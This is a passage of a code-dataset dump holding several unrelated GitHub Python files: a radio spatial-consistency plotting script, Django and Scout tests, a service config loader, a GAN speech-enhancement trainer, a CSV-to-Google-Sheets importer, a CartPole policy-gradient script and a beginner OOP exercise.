pods[idx].rx_gps_event)))\r\n velocities.append((vn, s_coeff(pod.pdp_segment, pods[i_].pdp_segment)))\r\n\r\nscd_layout = dict(xaxis=dict(title='Tx-Rx Distance (in m)'),\r\n title='Spatial Consistency Analysis vis-à-vis Distance',\r\n yaxis=dict(title='Spatial Autocorrelation Coefficient'))\r\nscd_trace = go.Scatter(x=[distn[0] for distn in distns], mode='lines+markers',\r\n y=signal.savgol_filter([distn[1] for distn in distns], sg_wsize, sg_poly_order))\r\n\r\nscv_layout = dict(xaxis=dict(title='Tx-Rx Relative Velocity (in m/s)'),\r\n title='Spatial Consistency Analysis vis-à-vis Velocity',\r\n yaxis=dict(title='Spatial Autocorrelation Coefficient'))\r\nscv_trace = go.Scatter(x=[vel[0] for vel in velocities], mode='lines+markers',\r\n y=signal.savgol_filter([veloc[1] for veloc in velocities], sg_wsize, sg_poly_order))\r\n\r\nsca_layout = dict(xaxis=dict(title='Tx-Rx Relative Alignment Accuracy (in deg)'),\r\n yaxis=dict(title='Spatial (Angular) Autocorrelation Coefficient'),\r\n title='Spatial (Angular) Consistency Analysis vis-à-vis Alignment')\r\nsca_trace = go.Scatter(x=[alignment[0] for alignment in alignments], mode='lines+markers',\r\n y=signal.savgol_filter([alignment[1] for alignment in alignments], sg_wsize, sg_poly_order))\r\n\r\nscd_url = plotly.plotly.plot(dict(data=[scd_trace], layout=scd_layout), filename=sc_distance_png)\r\nscv_url = plotly.plotly.plot(dict(data=[scv_trace], layout=scv_layout), filename=sc_velocity_png)\r\nsca_url = plotly.plotly.plot(dict(data=[sca_trace], layout=sca_layout), filename=sc_alignment_png)\r\n\r\nprint('SPAVE-28G | Consolidated Processing II | Spatial Consistency Analysis vis-à-vis Distance: {}.'.format(scd_url))\r\nprint('SPAVE-28G | Consolidated Processing II | Spatial Consistency Analysis vis-à-vis Velocity: {}.'.format(scv_url))\r\nprint('SPAVE-28G | Consolidated Processing II | Spatial Consistency Analysis vis-à-vis Alignment: {}.'.format(sca_url))\r\n\r\n\"\"\"\r\nCORE VISUALIZATIONS II: RMS delay spread and RMS direction spread\r\n\"\"\"\r\n\r\n# rms_aoa_dir_spreads = np.array([pod.rms_aoa_dir_spread for pod in pods])\r\n# rms_delay_spreads = np.array([pod.rms_delay_spread / 1e-9 for pod in pods])\r\n\r\n# rms_delay_spread_x, rms_delay_spread_ecdf = ecdf(rms_delay_spreads)\r\n# rms_aoa_dir_spread_x, rms_aoa_dir_spread_ecdf = ecdf(rms_aoa_dir_spreads)\r\n\r\n# rms_ds_layout = dict(yaxis=dict(title='CDF Probability'),\r\n# xaxis=dict(title='RMS Delay Spreads (x) in ns'),\r\n# title='RMS Delay Spread Cumulative Distribution Function')\r\n# rms_aoa_dirs_layout = dict(yaxis=dict(title='CDF Probability'),\r\n# xaxis=dict(title='RMS AoA Direction Spreads (x) in deg'),\r\n# title='RMS AoA Direction Spread Cumulative Distribution Function')\r\n\r\n# rms_ds_trace = go.Scatter(x=rms_delay_spread_x, y=rms_delay_spread_ecdf, mode='lines+markers')\r\n# rms_aoa_dirs_trace = go.Scatter(x=rms_aoa_dir_spread_x, y=rms_aoa_dir_spread_ecdf, mode='lines+markers')\r\n\r\n# rms_aoa_dirs_url = plotly.plotly.plot(dict(data=[rms_aoa_dirs_trace],\r\n# layout=rms_aoa_dirs_layout), filename=aoa_rms_dir_spread_png)\r\n# rms_ds_url = plotly.plotly.plot(dict(data=[rms_ds_trace], layout=rms_ds_layout), filename=rms_delay_spread_png)\r\n\r\n# print('SPAVE-28G | Consolidated Processing II | RMS Delay Spread CDF: {}.'.format(rms_ds_url))\r\n# print('SPAVE-28G | Consolidated Processing II | RMS AoA Direction Spread CDF: 
{}.'.format(rms_aoa_dirs_url))\r\n","repo_name":"bharathkeshavamurthy/SPAVE-28G","sub_path":"src/analyses/ConsolidatedPostProcessorII.py","file_name":"ConsolidatedPostProcessorII.py","file_ext":"py","file_size_in_byte":50177,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"2709751895","text":"from django.contrib.auth import get_user_model\r\nfrom django.test import Client, TestCase\r\nfrom django.urls import reverse\r\n\r\nfrom ..models import Group, Post\r\n\r\nFIRST_PAGE_POSTS_COUNT: int = 10\r\nSECOND_PAGE_POSTS_COUNT: int = 3\r\n\r\nUser = get_user_model()\r\n\r\n\r\nclass PaginatorTest(TestCase):\r\n @classmethod\r\n def setUpClass(cls):\r\n super().setUpClass()\r\n cls.user = User.objects.create_user(username='auth')\r\n cls.group = Group.objects.create(\r\n title='Тестовая группа',\r\n slug='test_slug',\r\n description='Тестовое описание',\r\n )\r\n cls.posts = [Post(\r\n author=cls.user,\r\n text='Тестовый пост',\r\n group=cls.group,\r\n ) for _ in range(FIRST_PAGE_POSTS_COUNT + SECOND_PAGE_POSTS_COUNT)]\r\n Post.objects.bulk_create(cls.posts)\r\n\r\n def setUp(self):\r\n self.auth_client = Client()\r\n self.auth_client.force_login(self.user)\r\n self.non_auth_client = Client()\r\n\r\n def test_posts_count_on_first_page(self):\r\n urls = [\r\n reverse('posts:index'),\r\n reverse(\r\n 'posts:group_list',\r\n kwargs={'slug': self.group.slug},\r\n ),\r\n reverse(\r\n 'posts:profile',\r\n kwargs={'username': self.user.username},\r\n ),\r\n ]\r\n for url in urls:\r\n with self.subTest():\r\n response = self.auth_client.get(url)\r\n self.assertEqual(\r\n len(response.context['page_obj']),\r\n FIRST_PAGE_POSTS_COUNT,\r\n )\r\n\r\n def test_posts_count_on_second_page(self):\r\n urls = [\r\n reverse('posts:index'),\r\n reverse(\r\n 'posts:group_list',\r\n kwargs={'slug': self.group.slug},\r\n ),\r\n reverse(\r\n 'posts:profile',\r\n kwargs={'username': self.user.username},\r\n ),\r\n ]\r\n for url in urls:\r\n with self.subTest():\r\n response = self.auth_client.get(url + '?page=2')\r\n self.assertEqual(\r\n len(response.context['page_obj']),\r\n SECOND_PAGE_POSTS_COUNT,\r\n )\r\n","repo_name":"Nasibao/yatube-final","sub_path":"yatube/posts/tests/test_paginator.py","file_name":"test_paginator.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42684658149","text":"# -*- coding: utf-8 -*-\n\nfrom scout.commands import cli\n\nfrom scout.server.extensions import store\n\ndef test_view_diseases(mock_app):\n \"\"\"Test CLI that shows all collections in the database\"\"\"\n\n runner = mock_app.test_cli_runner()\n assert runner\n\n # Test CLI\n result = runner.invoke(cli, ['view', 'collections'])\n assert result.exit_code == 0\n assert \"collections\\nexon\\nhpo_term\\ninstitute\\ncase\\nhgnc_gene\\nuser\\ngene_panel\\nvariant\\ntranscript\\nevent\\n\" in result.output\n","repo_name":"Clinical-Genomics-Lund/scout","sub_path":"tests/commands/view/test_view_collections_cmd.py","file_name":"test_view_collections_cmd.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"31655244038","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\nfrom urllib.parse import quote_plus\nimport base64\nfrom configparser import ConfigParser\n_get_module_path = lambda path: os.path.normpath(os.path.join(os.getcwd(),os.path.dirname(__file__), path))\n\ndef 
digit_int_from_env(envname, default=0):\n if envname not in os.environ:\n return default\n s=os.environ[envname]\n if s.isdigit():\n return int(s)\n else:\n return default\n\ndef mem_int_from_env(envname, default=100*(2**20)):\n if envname not in os.environ:\n return default\n s=os.environ[envname]\n if s.isdigit():\n return int(s)\n unit = s[-2:]\n val = s[:-2]\n if not val.isdigit():\n return default\n val = int(val)\n if unit == 'Ki':\n return val*(2**10)\n if unit == 'Mi':\n return val*(2**20)\n if unit == 'Gi':\n return val*(2**30)\n else:\n return default\n\ndef read_config_infile(section, config_path=\"\"):\n cfg = ConfigParser()\n cfg.read(config_path)\n if section in cfg.sections():\n return cfg[section]\n else:\n cfg[section] = dict()\n return cfg[section]\n\n#service_type supports four types: all, fast-text-analysis, common-classify, image-summary\nservice_type = os.environ.get('SERVICE_TYPE','all')\nserver_port = digit_int_from_env('SERVER_PORT', 9528)\npredata_path = _get_module_path('predata/similarity_data_list.json')\nstopwords_path = _get_module_path('predata/stop_words.txt')\nservice_code = os.environ.get('service_code','001')\n\n#Number of worker subprocesses to launch.\n#Default: 4.\n#One worker process can handle about 75K chars/s; raise this appropriately for high-load scenarios.\nworker_processes = mem_int_from_env('WORKER_PROCESSES', default = 1)\n\n#Maximum memory each worker subprocess is allowed to use; default 4GB\nmax_mem_use = mem_int_from_env('MAX_MEM_USE', default = 4*(2**30))\n\n#Maximum number of body bytes allowed to queue up: defaults to 1/8 of the maximum memory usage\nmax_stock_body_size = mem_int_from_env('MAX_STOCK_BODY_SIZE', default = max_mem_use/8)\n\n#Maximum length of a single text that may be processed\n#1024*(2**20) is the memory pandora occupies with no load\n#max_stock_body_size is the memory allocated to the body cache under high concurrency\n#50 comes from testing experience: processing a 1M-char text takes about 50MB of space\nmax_content_len = mem_int_from_env('MAX_CONTENT_LEN', default = (max_mem_use-1024*(2**20)-max_stock_body_size)/50)\n\n#Maximum buffer size allocated for each request\nmax_buffer_size = mem_int_from_env('MAX_BUFFER_SIZE', default = 100*(2**20))\n\n#Maximum body size; defaults to the maximum number of body bytes allowed to queue up.\nmax_body_size = mem_int_from_env('MAX_BODY_SIZE', default = max_stock_body_size)\n\n#MongoDB and Milvus configuration\nconfig_path = os.environ.get(\"config_path\", \"/root/server.conf\")\nmongodb_conf = read_config_infile(\"mongodb\", config_path=config_path)\nmongo_config = dict(\n host=mongodb_conf.get('host', \"aladdin-cas-mongo\").replace('\"', ''),\n port=int(mongodb_conf.get('port', \"27017\").replace('\"', '')),\n db_auth=mongodb_conf.get(\"db_auth\", \"admin\").replace('\"', ''),\n db=mongodb_conf.get(\"db\", \"aladdin-cas\").replace('\"', ''),\n user=quote_plus(mongodb_conf.get(\"user\", \"\").replace('\"', '')),\n password=quote_plus(mongodb_conf.get(\"password\", \"\").replace('\"', '')),\n replicaSet=quote_plus(mongodb_conf.get(\"replicaSet\", \"\").replace('\"', '')),\n sslCAFile=quote_plus(mongodb_conf.get(\"sslCAFile\", \"\").replace('\"', '')),\n ssl=quote_plus(mongodb_conf.get(\"ssl\", \"\").replace('\"', '')),\n options=mongodb_conf.get(\"options\", str(dict())).strip(),\n)\nmilvus_config = dict(\n host=os.environ.get('milvus_host','127.0.0.1'),\n port=os.environ.get('milvus_port',19530),\n)\n# milvus_od_collection = os.environ.get(\"milvus_od_collection\", \"object_detection\")\n# mongo_od_collection = os.environ.get(\"mongo_od_collection\", \"object_detection\")\n#MySQL configuration used for sensitive-file tagging\n\nmysql_config = dict(\n host=os.environ.get('mysql_host','127.0.0.1'),\n port=int(os.environ.get('mysql_port', 3306)),\n user=quote_plus(os.environ.get('mysql_user','root')),\n db='atf_db',\n password=quote_plus(os.environ.get('mysql_password', '123456')),\n #charset='utf8'\n)\n\ntfserving_config = dict(\n tfserving_host=os.environ.get(\"tfserving_host\", \"127.0.0.1\"),\n tfserving_port=os.environ.get(\"tfserving_port\", \"8500\")\n)\n\nglobalization_lang = \"en_US\"\n\n# exception_level\n# 0 code, message, cause, detail\n# 1 code, message, cause\n# 2 code, message\n# 3 code, cause, detail\n# 4 code, cause\nexception_level = int(os.environ.get(\"exception_level\", 0))\n\n# Threshold for object detection\ndetection_confidence_threshold = float(os.environ.get(\"detection_confidence_threshold\", 0.6))\n#tfserving object-detection model name\ndetection_model_name= os.environ.get(\"detection_model_name\", \"detection\")\n#tfserving image-classification model name\nclassify_model_name= os.environ.get(\"classify_model_name\", \"fbnetv2\")\n\nelasticsearch_conf = read_config_infile(\"elasticsearch\", config_path=config_path)\nelasticsearch_config = dict(\n host=elasticsearch_conf.get('host', \"aladdin-cas-es\").replace('\"', ''),\n port=int(elasticsearch_conf.get('port', \"9200\").replace('\"', '')),\n aliases=elasticsearch_conf.get('aliases', \"delg\").replace('\"', ''),\n index_num=int(elasticsearch_conf.get('index_num', \"128\").replace('\"', '')),\n index_type=int(elasticsearch_conf.get('index_type', \"0\").replace('\"', '')),\n)\n\ndl_inference_server_conf = read_config_infile(\"dl-inference-server\", config_path=config_path)\ndl_inference_server_config = dict(\n host=dl_inference_server_conf.get('host', \"aladdin-cas-dl\").replace('\"', ''),\n port=int(dl_inference_server_conf.get('port', \"8500\").replace('\"', '')),\n)\n\ndelg_conf = read_config_infile(\"delg-codebook\", config_path=config_path)\ndelg_config = dict(\n global_path_1=delg_conf.get(\"global_path_1\", \"\").replace('\"', ''),\n global_path_2=delg_conf.get(\"global_path_2\", \"\").replace('\"', ''),\n local_path_1=delg_conf.get(\"local_path_1\", \"\").replace('\"', ''),\n local_path_2=delg_conf.get(\"local_path_2\", \"\").replace('\"', ''),\n)\n","repo_name":"zhangxiaoyuan1988/aladdin","sub_path":"aladdin-cas/src/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17115600213","text":"import os\r\n\r\nfrom itertools import chain\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\nimport numpy as np\nfrom dataloader import npyDataset2d\nfrom model import Generator, Discriminator, ContentEncoder, StyleEncoder\nfrom utils import Tanhize \nfrom hparams import get_hparams\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nlambda_cy = 10 \nlambda_f = 1 \nlambda_s = 1 \nlambda_c = 1 \n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\ndef get_z_random(batch, dim1):\n\n z = torch.randn(batch, dim1).cuda()\n\n return z \n\n\ndef recon_criterion(x,y):\n return torch.mean(torch.abs(x-y))\n\n \ndef train():\n\n hparams = get_hparams()\n model_path = os.path.join( hparams.model_path, hparams.task_name, hparams.spec_opt )\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n\n # Load Dataset Loader\n\n\n normalizer_clean = Tanhize('clean')\n normalizer_noisy = Tanhize('noisy')\n\n\n \n print('Load dataset2d loader')\n dataset_A_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_A_2d, hparams.frame_len, normalizer = normalizer_noisy)\n dataset_B_2d = 
npyDataset2d(hparams.dataset_root,hparams.list_dir_train_B_2d, hparams.frame_len, normalizer = normalizer_clean)\n \n dataloader_A = DataLoader(dataset_A_2d, batch_size = hparams.batch_size,\n shuffle = True,\n drop_last = True,\n )\n dataloader_B = DataLoader(dataset_B_2d, batch_size = hparams.batch_size,\n shuffle = True,\n drop_last = True,\n )\n \n \n # Load Generator / Disciminator model\n generator_A = Generator()\n generator_B = Generator()\n\n discriminator_A = Discriminator()\n discriminator_B = Discriminator()\n\n ContEncoder_A = ContentEncoder()\n ContEncoder_B = ContentEncoder()\n\n StEncoder_A = StyleEncoder()\n StEncoder_B = StyleEncoder()\n\n\n generator_A.apply(weights_init)\n generator_B.apply(weights_init) \n\n discriminator_A.apply(weights_init) \n discriminator_B.apply(weights_init) \n\n ContEncoder_A.apply(weights_init)\n ContEncoder_B.apply(weights_init)\n\n StEncoder_A.apply(weights_init)\n StEncoder_B.apply(weights_init)\n\n \n real_label = 1\n fake_label = 0\n real_tensor = Variable(torch.FloatTensor(hparams.batch_size))\n _ = real_tensor.data.fill_(real_label)\n\n fake_tensor = Variable(torch.FloatTensor(hparams.batch_size))\n _ = fake_tensor.data.fill_(fake_label)\n \n # Define Loss function\n d = nn.MSELoss()\n bce = nn.BCELoss()\n\n # Cuda Process\n if hparams.cuda == True:\n print('-- Activate with CUDA --')\n\n generator_A = nn.DataParallel(generator_A).cuda()\n generator_B = nn.DataParallel(generator_B).cuda()\n discriminator_A = nn.DataParallel(discriminator_A).cuda()\n discriminator_B = nn.DataParallel(discriminator_B).cuda()\n ContEncoder_A = nn.DataParallel(ContEncoder_A).cuda()\n ContEncoder_B = nn.DataParallel(ContEncoder_B).cuda()\n StEncoder_A = nn.DataParallel(StEncoder_A).cuda()\n StEncoder_B = nn.DataParallel(StEncoder_B).cuda()\n\n d.cuda()\n bce.cuda()\n real_tensor = real_tensor.cuda()\n fake_tensor = fake_tensor.cuda()\n\n else:\n print('-- Activate without CUDA --')\n\n \n\n\n gen_params = chain(\n generator_A.parameters(),\n generator_B.parameters(),\n ContEncoder_A.parameters(),\n ContEncoder_B.parameters(),\n StEncoder_A.parameters(),\n StEncoder_B.parameters(),\n )\n\n dis_params = chain(\n discriminator_A.parameters(), \n discriminator_B.parameters(), \n )\n\n optimizer_g = optim.Adam( gen_params, lr=hparams.learning_rate)\n optimizer_d = optim.Adam( dis_params, lr=hparams.learning_rate)\n\n iters = 0\n for e in range(hparams.epoch_size):\n\n \n # input Tensor \n\n A_loader, B_loader = iter(dataloader_A), iter(dataloader_B)\n \n for i in range(len(A_loader)-1):\n \n batch_A = A_loader.next()\n batch_B = B_loader.next()\n\n A_indx = torch.LongTensor(list( range(hparams.batch_size)))\n B_indx = torch.LongTensor(list( range(hparams.batch_size)))\n\n\n A_ = torch.FloatTensor(batch_A) \n B_ = torch.FloatTensor(batch_B)\n\n if hparams.cuda == True:\n \n\n x_A = Variable(A_.cuda())\n x_B = Variable(B_.cuda())\n\n\n else:\n x_A = Variable(A_)\n x_B = Variable(B_)\n\n real_tensor.data.resize_(hparams.batch_size).fill_(real_label)\n fake_tensor.data.resize_(hparams.batch_size).fill_(fake_label)\n\n \n \n\n ## Discrominator Update Steps\n\n discriminator_A.zero_grad()\n discriminator_B.zero_grad()\n\n # x_A, x_B, x_AB, x_BA\n # [#_batch, max_time_len, dim]\n\n A_c = ContEncoder_A(x_A).detach()\n B_c = ContEncoder_B(x_B).detach()\n\n # A,B : N ~ (0,1)\n A_s = Variable(get_z_random(hparams.batch_size, 8))\n B_s = Variable(get_z_random(hparams.batch_size, 8))\n \n\n x_AB = generator_B(A_c, B_s).detach()\n x_BA = generator_A(B_c, A_s).detach()\n\n\n\n 
# We recommend LSGAN-loss for adversarial loss\n \n l_d_A_real = 0.5 * torch.mean( (discriminator_A(x_A) - real_tensor) **2 ) \n l_d_A_fake = 0.5 * torch.mean( (discriminator_A(x_BA) - fake_tensor) **2 )\n\n l_d_B_real = 0.5 * torch.mean( (discriminator_B(x_B) - real_tensor)** 2) \n l_d_B_fake = 0.5 * torch.mean( (discriminator_B(x_AB) - fake_tensor) ** 2)\n\n\n l_d_A = l_d_A_real + l_d_A_fake\n l_d_B = l_d_B_real + l_d_B_fake\n\n\n l_d = l_d_A + l_d_B \n \n l_d.backward()\n optimizer_d.step()\n \n\n ## Generator Update Steps\n\n generator_A.zero_grad()\n generator_B.zero_grad()\n ContEncoder_A.zero_grad()\n ContEncoder_B.zero_grad()\n StEncoder_A.zero_grad()\n StEncoder_B.zero_grad()\n\n A_c = ContEncoder_A(x_A)\n B_c = ContEncoder_B(x_B)\n\n A_s_prime = StEncoder_A(x_A)\n B_s_prime = StEncoder_B(x_B)\n \n\n # A,B : N ~ (0,1)\n A_s = Variable(get_z_random(hparams.batch_size, 8))\n B_s = Variable(get_z_random(hparams.batch_size, 8))\n \n\n x_BA = generator_A(B_c, A_s)\n x_AB = generator_B(A_c, B_s)\n\n x_A_recon = generator_A(A_c, A_s_prime)\n x_B_recon = generator_B(B_c, B_s_prime)\n\n\n B_c_recon = ContEncoder_A(x_BA)\n A_s_recon = StEncoder_A(x_BA)\n\n A_c_recon = ContEncoder_B(x_AB)\n B_s_recon = StEncoder_B(x_AB)\n\n\n \n x_ABA = generator_A(A_c_recon, A_s_prime)\n x_BAB = generator_B(B_c_recon, B_s_prime)\n\n l_cy_A = recon_criterion(x_ABA, x_A)\n l_cy_B = recon_criterion(x_BAB, x_B)\n\n l_f_A = recon_criterion(x_A_recon, x_A)\n l_f_B = recon_criterion(x_B_recon, x_B)\n\n l_c_A = recon_criterion(A_c_recon, A_c)\n l_c_B = recon_criterion(B_c_recon, B_c)\n\n l_s_A = recon_criterion(A_s_recon, A_s)\n l_s_B = recon_criterion(B_s_recon, B_s)\n\n\n # We recommend LSGAN-loss for adversarial loss\n \n l_gan_A = 0.5 * torch.mean( (discriminator_A(x_BA) - real_tensor) **2)\n l_gan_B = 0.5 * torch.mean( (discriminator_B(x_AB) - real_tensor ) **2)\n\n l_g = l_gan_A + l_gan_B + lambda_f *( l_f_A + l_f_B) + lambda_s * (l_s_A + l_s_B) + lambda_c * (l_c_A + l_c_B) + lambda_cy * ( l_cy_A + l_cy_B)\n\n l_g.backward()\n optimizer_g.step()\n\n \n\n if iters % hparams.log_interval == 0:\n print (\"---------------------\")\n\n print (\"Gen Loss :{} disc loss :{}\".format(l_g/hparams.batch_size , l_d/hparams.batch_size))\n print (\"epoch :\" , e , \" \" , \"total \", hparams.epoch_size)\n print (\"iteration :\", iters )\n\n if iters % hparams.model_save_interval == 0:\n torch.save( generator_A.state_dict(), os.path.join(model_path, 'model_gen_A_{}.pth'.format(iters)))\n torch.save( generator_B.state_dict(), os.path.join(model_path, 'model_gen_B_{}.pth'.format(iters)))\n torch.save( discriminator_A.state_dict(), os.path.join(model_path, 'model_dis_A_{}.pth'.format(iters)))\n torch.save( discriminator_B.state_dict(), os.path.join(model_path, 'model_dis_B_{}.pth'.format(iters)))\n\n torch.save( ContEncoder_A.state_dict(), os.path.join(model_path, 'model_ContEnc_A_{}.pth'.format(iters)))\n torch.save( ContEncoder_B.state_dict(), os.path.join(model_path, 'model_ContEnc_B_{}.pth'.format(iters)))\n torch.save( StEncoder_A.state_dict(), os.path.join(model_path, 'model_StEnc_A_{}.pth'.format(iters)))\n torch.save( StEncoder_B.state_dict(), os.path.join(model_path, 'model_StEnc_B_{}.pth'.format(iters)))\n\n iters += 1\n \nif __name__ == '__main__':\n train()\n\n","repo_name":"vivivic/speech-domain-adaptation-DRL","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"} 
+{"seq_id":"27930543512","text":"import csv\nimport gspread\nfrom gspread import utils\nfrom io import StringIO\nfrom typing import Union, Optional\n\nfrom .utils.conf import load_config\nfrom .utils.credentials import load_credentials_from_json, load_credentials_from_dict\n\n\nCSV_SNIFFER_BUFFER_SIZE = 4096\n\n\ndef import_csv(source: Optional[Union[str, StringIO]] = None,\n url: Optional[str] = None,\n cell: Optional[str] = None,\n credentials: Optional[Union[str, dict]] = None,\n config: Optional[Union[str, dict]] = None) -> dict:\n \"\"\"\n Import CSV file to Google sheet\n\n :param source: path to source CSV file or StringIO object\n :param url: destination sheet url\n :param cell: destination sheet cell (can include tab name: 'MyTab!A1')\n :param credentials: path to google service account credentials file or dict\n :param config: path to config file or dict\n :return: Google Sheet API response object\n \"\"\"\n settings = load_config(config) if isinstance(config, str) else None\n if settings is None and (source is None or url is None or credentials is None):\n raise ValueError('required parameters missed')\n\n csv_sniffer_buffer_size = CSV_SNIFFER_BUFFER_SIZE\n\n if settings is not None:\n source = settings.get('source', source)\n url = settings.get('url', url)\n cell = settings.get('cell', 'A1')\n credentials = settings.get('credentials', credentials)\n csv_sniffer_buffer_size = settings.get('csv_sniffer_buffer_size', CSV_SNIFFER_BUFFER_SIZE)\n\n cell = cell if cell is not None else 'A1'\n\n # TODO: add other types of credentials\n if isinstance(credentials, dict):\n credentials = load_credentials_from_dict(credentials)\n elif isinstance(credentials, str):\n credentials = load_credentials_from_json(credentials)\n else:\n credentials = None\n\n if credentials is None:\n raise ValueError('invalid credentials')\n\n if isinstance(source, str):\n try:\n infile = open(source, 'r')\n dialect = csv.Sniffer().sniff(infile.read(csv_sniffer_buffer_size))\n infile.seek(0)\n csv_data = infile.read()\n except Exception as e:\n raise ValueError(f'source file error {str(e)}')\n elif isinstance(source, StringIO):\n dialect = csv.Sniffer().sniff(source.read(csv_sniffer_buffer_size))\n source.seek(0)\n csv_data = source.read()\n else:\n raise ValueError('not supported source type')\n\n gc = gspread.authorize(credentials)\n sheet = gc.open_by_url(url)\n\n if '!' 
in cell:\n tab_name, cell = cell.split('!')\n worksheet = sheet.worksheet(tab_name)\n clear_range = f'{tab_name}!'\n else:\n worksheet = sheet.sheet1\n clear_range = ''\n\n # clear old values in the sheet\n row_col = utils.rowcol_to_a1(worksheet.row_count, worksheet.col_count)\n clear_range = f'{clear_range}A1:{row_col}'\n sheet.values_clear(clear_range)\n\n first_row, first_column = utils.a1_to_rowcol(cell)\n\n body = {\n 'requests': [{\n 'pasteData': {\n \"coordinate\": {\n \"sheetId\": worksheet.id,\n \"rowIndex\": first_row - 1,\n \"columnIndex\": first_column - 1,\n },\n \"data\": csv_data,\n \"type\": 'PASTE_NORMAL',\n \"delimiter\": dialect.delimiter\n }\n }]\n }\n\n return sheet.batch_update(body)\n","repo_name":"dlancer/csv-export-gsheets","sub_path":"csv_export_gsheets/gsheet.py","file_name":"gsheet.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5719794646","text":"import numpy as np\nimport lqg1d\nimport matplotlib.pyplot as plt\nimport utils\nfrom cartpole import CartPoleEnv\n\nclass ConstantStep(object):\n def __init__(self, learning_rate):\n self.learning_rate = learning_rate\n\n def update(self, gt):\n return self.learning_rate * gt\n\n\nclass AnnealingStep(object):\n def __init__(self, learning_rate):\n self.learning_rate = learning_rate\n self.count = 10\n\n def update(self, gt):\n self.count += 1\n return self.learning_rate * gt / self.count\n\n\nclass AdamStep(object):\n def __init__(self, learning_rate):\n self.beta1=0.9\n self.beta2=0.999\n self.eps=1e-8\n self.alpha = learning_rate\n self.m_old = 0\n self.v_old = 0\n self.betaT1 = self.beta1\n self.betaT2 = self.beta2\n\n\n def update(self, gt):\n mt = self.beta1*self.m_old + (1-self.beta1) * gt\n vt = self.beta2*self.v_old + (1-self.beta2) * (gt*gt)\n m_hat = mt/(1-self.betaT1)\n v_hat = vt/(1-self.betaT2)\n self.betaT1 *= self.beta1\n self.betaT2 *= self.beta2\n return self.alpha * m_hat / (np.sqrt(v_hat)+self.eps)\n\n\n#####################################################\n# Define the environment and the policy\n#####################################################\nenv = CartPoleEnv()\n\n\nclass Policy(object):\n def __init__(self):\n self.theta = np.zeros(8)\n self.K = 1.0\n\n def draw_action(self, state):\n if np.random.random()\".format(self.capacity, self.speed, self.number)\n\n# \tdef __eq__(self, other):\n# \t\treturn type(other) == type(self) and self.number == other.number\n\n# \tdef __hash__(self):\n# \t\treturn hash(self.capacity * self.speed * len(self.number))\n\n# a = Car(100, 100, \"asd\")\n# b = Car(100, 100, \"zzz\")\n# c = Car(200, 50, \"asd\")\n\n# # These are not equal\n# print(a == b)\n# # These are equal\n# print(a == c)\n\n# print(a == None)\n# print(a == 1)\n\n# s = set()\n# s.add(a)\n# s.add(b)\n# s.add(c)\n# s.add(a)\n# s.add(a)\n\n# # We expect to see the numbers of two cars,\n# # since everything else is a duplicate under the logic described\n# print(\"=== Cars in set ===\")\n# for z in sorted(s, key=lambda e: e.number):\n# print(z.number)\n\n# class RaceCar(Car):\n# \tdef __init__(self, v):\n# \t\tself.capacity = 0\n# \t\tself.speed = v\n# \t\tself.number = None\n# \t\t# self = Car(0, v, None)\n\n# c = Car(1, 2, 3)\n# print(c)\n# r = RaceCar(10)\n# print(r.capacity)\n\n# class MoneyBox:\n# \tdef __init__(self):\n# \t\tself.money = 0\n# \t\tself.coins = 0\n\n# \tdef add_coin(self, value):\n# \t\tself.money += value\n# \t\tself.coins += 1\n\n# 
\tdef get_coins_value(self):\n# \t\treturn self.money\n\n# m = MoneyBox()\n# # Added a coin worth 10\n# m.add_coin(10)\n# # Added a coin worth 5\n# m.add_coin(5)\n\n# # We expect 2 coins inside\n# print(m.get_coins_number())\n# # We expect the total value of all coins to be 15\n# print(m.get_coins_value())\n\nclass Car:\n    def __init__(self, c, s, n):\n        self.capacity = int(c)\n        self.speed = int(s)\n        self.number = n\n\n# Truck\nclass Truck(Car):\n    pass\n\n# Bus\nclass Bus(Car):\n    pass\n\nclass Garage:\n\tdef __init__(self):\n\t\tself.cars = []\n\t\tself.trucks = []\n\t\tself.buses = []\n\n\tdef park(self, v):\n\t\tif(type(v) == Car):\n\t\t\tself.cars.append(v)\n\t\telif(type(v) == Truck):\n\t\t\tself.trucks.append(v)\n\t\t\tself.cars.append(v)\n\t\telif(type(v) == Bus):\n\t\t\tself.buses.append(v)\n\t\t\tself.cars.append(v)\n\n\tdef count(self, t):\n\t\tif(t == Car):\n\t\t\treturn len(self.cars)\n\t\tif(t == Truck):\n\t\t\treturn len(self.trucks)\n\t\tif(t == Bus):\n\t\t\treturn len(self.buses)\n\n\tdef get_fastest_of_type(self, t):\n\t\tif(t == Car):\n\t\t\treturn max(self.cars, key = lambda vehicle : vehicle.speed)\n\t\tif(t == Truck):\n\t\t\treturn max(self.trucks, key = lambda vehicle : vehicle.speed)\n\t\tif(t == Bus):\n\t\t\treturn max(self.buses, key = lambda vehicle : vehicle.speed)\n\ng = Garage()\n# Park the cars\ng.park(Car(1, 100, \"abc\"))\ng.park(Truck(1000, 150, \"zzz\"))\ng.park(Bus(100, 50, \"QWE\"))\ng.park(Bus(100, 80, \"ASD\"))\ng.park(Bus(100, 20, \"ZXC\"))\n\n# How many cars in total? We expect 5, because a truck and a bus are cars too.\nprint(g.count(Car))\n# How many trucks in total? We expect 